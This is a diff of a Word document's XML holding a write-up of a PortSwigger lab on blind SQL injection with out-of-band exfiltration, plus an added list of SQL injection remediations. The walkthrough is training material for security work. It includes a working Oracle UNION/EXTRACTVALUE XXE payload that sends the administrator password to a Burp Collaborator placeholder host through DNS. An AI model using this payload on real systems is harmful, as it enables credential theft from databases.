--- a/PortSwigger Labs/Server Side Topics/SQL Injection/Lab x -  Blind SQL injection with out-of-band data exfiltration.docx
+++ b/PortSwigger Labs/Server Side Topics/SQL Injection/Lab x -  Blind SQL injection with out-of-band data exfiltration.docx
@@ -92,7 +92,16 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>to cause a DNS lookup to Burp</w:t>
+        <w:t xml:space="preserve">to cause a DNS lookup to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Burp</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -102,6 +111,7 @@
         </w:rPr>
         <w:t>Suite’s</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -185,7 +195,27 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Open the application and send the request for homepage to BurpSuite’s Repeater.</w:t>
+        <w:t xml:space="preserve">Open the application and send the request for homepage to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>BurpSuite’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Repeater.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -282,7 +312,27 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Open BurpSuite’s Collaborator Client and copy its address and using that we will craft a Payload.</w:t>
+        <w:t xml:space="preserve">Open </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>BurpSuite’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Collaborator Client and copy its address and using that we will craft a Payload.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -342,16 +392,56 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>the TrackingID token value</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and when we click Poll Now we can see requests made to our server.</w:t>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>TrackingID</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> token value</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and when we click Poll </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Now</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> we can see requests made to our server.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -431,7 +521,27 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>'+UNION+SELECT+EXTRACTVALUE(xmltype('&lt;%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f&gt;&lt;!DOCTYPE+root+[+&lt;!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/"&gt;+%25remote%3b]&gt;'),'/l')+FROM+dual--</w:t>
+        <w:t>'+UNION+SELECT+</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>EXTRACTVALUE(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xmltype('&lt;%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f&gt;&lt;!DOCTYPE+root+[+&lt;!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/"&gt;+%25remote%3b]&gt;'),'/l')+FROM+dual--</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -469,6 +579,351 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>REMEDIATION</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Prepared Statements:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Always use prepared statements with parameterized queries. These ensure that the parameters (user input) passed into SQL </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">statements are treated in a safe manner. In Java, for example, use </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>PreparedStatement</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> rather than Statement.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ORMs:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Use Object-Relational Mapping (ORM) frameworks. These libraries usually protect against SQL injection by avoiding the need to write SQL code directly.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Stored Procedures:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Use stored procedures instead of direct SQL queries.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Escape User Input:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Escape all user data before it's used in a query, although this is less secure than prepared statements.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>White List Input Validation:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Input validation is always a good idea, but do not rely on blacklisting specific keywords for SQLi prevention. Instead, use a whitelist approach where only specified and known good input is accepted.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Least Privilege Principle:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Always connect to the database with an account that has the least privileges necessary. This way, even if there is a SQL injection vulnerability, the damage is limited.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Error Handling:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Do not reveal detailed database errors to the user. This information can be used by an attacker to refine their attacks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Web Application Firewall:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Use a Web Application Firewall (WAF) that can detect and block SQLi attacks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Database Hardening:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Configure your database to reduce the attack surface. This includes disabling unnecessary features, removing or changing default accounts, and patching regularly.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -572,8 +1027,100 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="72241C81"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="061A8CC6"/>
+    <w:lvl w:ilvl="0" w:tplc="4009000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1401321648">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="930744293">
+    <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>
 </file>
